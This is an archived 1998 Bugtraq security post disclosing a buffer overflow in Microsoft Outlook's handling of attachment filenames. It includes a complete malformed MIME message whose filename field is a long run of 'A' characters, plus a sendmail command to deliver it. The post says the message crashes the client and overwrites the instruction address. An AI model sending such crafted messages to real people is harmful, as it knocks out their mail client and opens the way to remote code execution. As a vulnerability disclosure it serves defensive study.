[7478] in bugtraq
One of the Outlook overflows
daemon@ATHENA.MIT.EDU (Ryan Veety)
Wed Jul 29 21:43:28 1998
Date: Wed, 29 Jul 1998 16:34:54 -0400
Reply-To: Ryan Veety <root@RYANSPC.COM>
From: Ryan Veety <root@RYANSPC.COM>
To: BUGTRAQ@NETSPACE.ORG
There have been a few posts about overflows in MS Outlook, but they have
not told exactly where in the message the overflow exists. I have found
one of them, within the description of an attachment. If the filename
given is very large, it makes Outlook crash. I tried this on Outlook
v4.72.2106.4 on NT 4.0, and on win95. In both cases it reported an error
at address 0x41414141 (41 == hex A). Here is the message that caused the
errors:
--------------------------- START HERE --------------------------------
From: <From address here>
To: <To address here>
Subject: test
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806"
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII
test
--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Don't read this text file
--204-1969819122-901726347=:19806--
------------------------ END HERE --------------------------------------
To send the message, save it to a file, set the to: and from:, and run
"sendmail -t < fileyousaved"
It causes Outlook to crash when the user attempts to open or save the
file. According to a previous post, there are many of these overflows in
the attachment discriptors. This one requires the user to open the
attachment, but similar overflows may not.
Ryan
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQBtAzWOgPAAAAEDAMLNosknbxL/d/a4xhdleyF1VFAtN7qV0qr88TePfp4D/otw
10dkld3jy09kU1V/KvStWDyVEqX9KWZWholg2YkGupoRvJIUMgRgkpryKzjfbYIg
c4wCPs0kU4Bp8hvUzQAFEbQdUnlhbiBWZWV0eSA8cnlhbkByeWFuc3BjLmNvbT6J
AHUDBRA1joDwJFOAafIb1M0BAVvpAwCBVdN6XNj4JKxFb9/zz1+Lq9HzFSrxW/9S
S+rWDxUU2Yirtp/TM9bxyj4Q4siIUwwlWkS0Mq3uCxss6hw65m2dqX2hlZDsE2Es
lvzSliBaQRGPlWz9z26jtCZgxM5BliQ=
=7G/D
-----END PGP PUBLIC KEY BLOCK-----
